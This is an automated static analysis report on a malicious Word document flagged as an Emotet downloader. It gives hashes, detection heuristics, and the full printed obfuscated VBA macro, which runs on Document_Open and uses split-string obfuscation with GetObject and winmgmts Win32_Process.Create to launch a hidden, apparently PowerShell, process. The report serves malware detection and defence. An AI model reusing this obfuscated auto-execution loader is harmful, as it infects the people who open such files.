Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 329643c1e9fcc1e3…

MALICIOUS

Office (OOXML)

127.0 KB Created: 2020-02-03 22:55:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 76bf50ea627540ee73094e59ccd1ef32 SHA-1: 68007847797b9d3a128b1d6d009a5285ac385cf7 SHA-256: 329643c1e9fcc1e3410cb4852c8f35eedc75a73a6aa95122d2cef2b2e017e145
232 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-7577035-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7577035-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Opivzsnx = GetObject(DC + Efbyazstptb)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10565 bytes
SHA-256: 0a94381391a509a46aec567d623c4c6e8f3903a8bec3bf1f6b9c51880cc2fe1b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
81 of 147 identifiers look randomly generated (e.g. 'Bdvpzufuxrrhl'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Qrcpgvuniq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (516) + 309
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 25 + 103 + 891
Atr6258312345 = (Ztzojmxkpt) + Atr625831282
Atr62583126 = Xxyblsrhr + Xjyahbros + Zczzefuey
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (720) + 534
Atr62583123445 = (903) + 869
Atr62583122345 = ("{Pita Jeremo 777}")
Haxnctecjve.Bmimmqwy
End Sub

Attribute VB_Name = "Fhqxhnrrmm"
Attribute VB_Base = "0{57646172-2FE1-49FB-A32B-D61FFBAD1E65}{F2D2F0EC-5D0C-4716-854C-19B991927D82}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Haxnctecjve"
Function Bmimmqwy()
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (487) + 667
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 789 + 546 + 292
Atr6258312345 = (Kvujdsbji) + Atr625831282
Atr62583126 = Lwulxfldz + Hkmiqjsplrnc + Bfeiutfpwot
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (232) + 674
Atr62583123445 = (365) + 669
Atr62583122345 = ("{Pita Jeremo 777}")
Xqzxprtp = "^348^288^836^234wi^348^288^836^234nm^348^288^836^234g^348^288^836^234mt^348^288^836^234" + ChrW(Fhqxhnrrmm.Zoom + 15) + "^348^288^836^234:w^348^288^836^234in^348^288^836^23432^348^288^836^234_" + Fhqxhnrrmm.Edxkpqcyh + "r^348^288^836^234oc^348^288^836^234e^348^288^836^234s^348^288^836^234s"
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (209) + 249
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 780 + 206 + 34
Atr6258312345 = (Pihpawzn) + Atr625831282
Atr62583126 = Kopgxkcicjuwa + Lcvwdxibcgmrq + Teefrocn
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (746) + 250
Atr62583123445 = (731) + 298
Atr62583122345 = ("{Pita Jeremo 777}")
Efbyazstptb = Vfydllpus(Xqzxprtp)
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (985) + 356
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 417 + 325 + 278
Atr6258312345 = (Mbfaooswx) + Atr625831282
Atr62583126 = Mstqncpo + Emdswomozl + Obbjzmyzlju
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (695) + 83
Atr62583123445 = (595) + 942
Atr62583122345 = ("{Pita Jeremo 777}")
Set Opivzsnx = GetObject(DC + Efbyazstptb)
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (87) + 715
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 426 + 478 + 731
Atr6258312345 = (Xeonixjsm) + Atr625831282
Atr62583126 = Qjsmdtskn + Ztqsobqet + Rbcfncciju
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (933) + 556
Atr62583123445 = (257) + 195
Atr62583122345 = ("{Pita Jeremo 777}")
Xinqdshetnji = Fhqxhnrrmm.Izesosrmxjs.Tag
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (888) + 591
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 966 + 387 + 421
Atr6258312345 = (Ecygjblsnlw) + Atr625831282
Atr62583126 = Ogzrqzdeuja + Fiuedmmcpwla + Yvrnoyhjfjt
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (728) + 912
Atr62583123445 = (505) + 526
Atr62583122345 = ("{Pita Jeremo 777}")
Qaswprtrzcs = Efbyazstptb + ChrW(Int(wdKeyS)) + Fhqxhnrrmm.Rhbeigrgko.Tag + Xinqdshetnji
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (846) + 656
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 871 + 701 + 812
Atr6258312345 = (Miphortrwhbv) + Atr625831282
Atr62583126 = Wjieqnbppuzk + Ooeehhnqxs + Ecyxzhjxmclnq
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (295) + 132
Atr62583123445 = (100) + 334
Atr62583122345 = ("{Pita Jeremo 777}")
Wabmdnvujkj = Qaswprtrzcs + Fhqxhnrrmm.Edxkpqcyh
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (307) + 857
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 861 + 120 + 553
Atr6258312345 = (Himjlitrrdxg) + Atr625831282
Atr62583126 = Wztdcgrtnqv + Rddcjgkarbp + Zgquvopguze
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (810) + 819
Atr62583123445 = (532) + 511
Atr62583122345 = ("{Pita Jeremo 777}")
Set Kgyptsgk = Ydyoqvavenvq(Wabmdnvujkj)
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (299) + 634
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 615 + 180 + 948
Atr6258312345 = (Bdvpzufuxrrhl) + Atr625831282
Atr62583126 = Ajohizhuf + Clqfnzhsgw + Dnmhoytlon
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (777) + 923
Atr62583123445 = (766) + 384
Atr62583122345 = ("{Pita Jeremo 777}")
Call Opivzsnx. _
Create(JOP + Goeoxzaxqc + NSD, Cnqnnfcmwhn, Kgyptsgk, Xedrncxs, Zizlykbx, Ysngmdkve)
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (345) + 349
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 919 + 156 + 619
Atr6258312345 = (Qypwppkyz) + Atr625831282
Atr62583126 = Tcztzkyx + Glygtqgm + Mwknegvx
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (789) + 201
Atr62583123445 = (79) + 585
Atr62583122345 = ("{Pita Jeremo 777}")
End Function
Function Ydyoqvavenvq(Bxrbctgerw)
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (654) + 784
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 294 + 659 + 179
Atr6258312345 = (Sxshytbh) + Atr625831282
Atr62583126 = Sfwybpymgkm + Qytmfbdnlidaq + Yfaesrzfnabua
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (893) + 61
Atr62583123445 = (329) + 213
Atr62583122345 = ("{Pita Jeremo 777}")
Set Ydyoqvavenvq = GetObject(Bxrbctgerw)
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (375) + 615
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 95 + 759 + 470
Atr6258312345 = (Xddmelytelyj) + Atr625831282
Atr62583126 = Mnzxdkhr + Nulenkfsllstd + Mpbxtmlkwyy
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (235) + 399
Atr62583123445 = (226) + 937
Atr62583122345 = ("{Pita Jeremo 777}")
Ydyoqvavenvq. _
showwindow = Llcwqqas + Wvkrenudb
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (92) + 598
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 534 + 265 + 377
Atr6258312345 = (Aaifstzx) + Atr625831282
Atr62583126 = Fajdmwrhopuai + Buxzphbkk + Iknfxnkvydoh
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (457) + 311
Atr62583123445 = (994) + 698
Atr62583122345 = ("{Pita Jeremo 777}")
End Function
Function Vfydllpus(Mrlwprsneo)
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (17) + 821
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 220 + 815 + 98
Atr6258312345 = (Bhteqrvp) + Atr625831282
Atr62583126 = Vjusylrloy + Oapfgrshr + Ovobffhggtkj
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (638) + 363
Atr62583123445 = (986) + 718
Atr62583122345 = ("{Pita Jeremo 777}")
Vfydllpus = VBA.Join(Split(Mrlwprsneo, "^348^288^836^234"), NoLineBreakAfter)
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (183) + 693
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 467 + 140 + 818
Atr6258312345 = (Piomfdvskw) + Atr625831282
Atr62583126 = Gauyhgrtn + Zinyqoyr + Hlfpbwvfqwkp
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (211) + 809
Atr62583123445 = (139) + 667
Atr62583122345 = ("{Pita Jeremo 777}")
End Function
Function Goeoxzaxqc()
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (90) + 156
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 918 + 623 + 55
Atr6258312345 = (Htkyykvjwyixj) + Atr625831282
Atr62583126 = Wthezxerhdpq + Jotdsczx + Dcgljvhdfvr
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (126) + 90
Atr62583123445 = (129) + 786
Atr62583122345 = ("{Pita Jeremo 777}")
oIP = "     -e      "
Oecqhsvzy = ChrW(Int(wdKeyP))
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (121) + 76
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 548 + 244 + 794
Atr6258312345 = (Dejzraqa) + Atr625831282
Atr62583126 = Nahpmuems + Mowbnggztmt + Apgsorehrcmh
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (274) + 514
Atr62583123445 = (997) + 585
Atr62583122345 = ("{Pita Jeremo 777}")
Ixmwtksprln = Oecqhsvzy + Fhqxhnrrmm.Uhjujxgpoeo.ControlTipText + oIP
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (999) + 598
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 45 + 951 + 546
Atr6258312345 = (Wraaqvuyunvpp) + Atr625831282
Atr62583126 = Ayardwdfs + Wfzkwylexyr + Utzqtdfdv
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (536) + 113
Atr62583123445 = (721) + 451
Atr62583122345 = ("{Pita Jeremo 777}")
sjw = Fhqxhnrrmm.Otpfookrdxxkv.Pages(0).Caption
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (315) + 447
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 945 + 8 + 656
Atr6258312345 = (Jrszmdyust) + Atr625831282
Atr62583126 = Oqtovwkgkstkk + Znozjaoju + Wmcyunmrfjsbh
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (892) + 336
Atr62583123445 = (576) + 494
Atr62583122345 = ("{Pita Jeremo 777}")
Goeoxzaxqc = Vfydllpus(Ixmwtksprln + StrReverse(sjw))
   Atr6258312758 = "{Pita Jeremo 777}" + "Inbs"
Atr6258312777 = (431) + 944
Atr625831282 = "{Pita Jeremo 777}" + "juigj"
Atr625831224 = ("{Pita Jeremo 777}")
Atr625831223 = 798 + 174 + 777
Atr6258312345 = (Oumbujkizzgco) + Atr625831282
Atr62583126 = Lwqqlzupsgar + Ukdoxdefuetd + Nvbxzqqxrw
Atr625831243 = ("{Pita Jeremo 777}")
Atr625831299 = (811) + 752
Atr62583123445 = (693) + 246
Atr62583122345 = ("{Pita Jeremo 777}")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 50688 bytes
SHA-256: ab87114ba05d3cba749aa54b4e23ce4c5d731febcd006a9112c954cca606bc3d
Detection
ClamAV: Doc.Downloader.Emotet-7577035-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.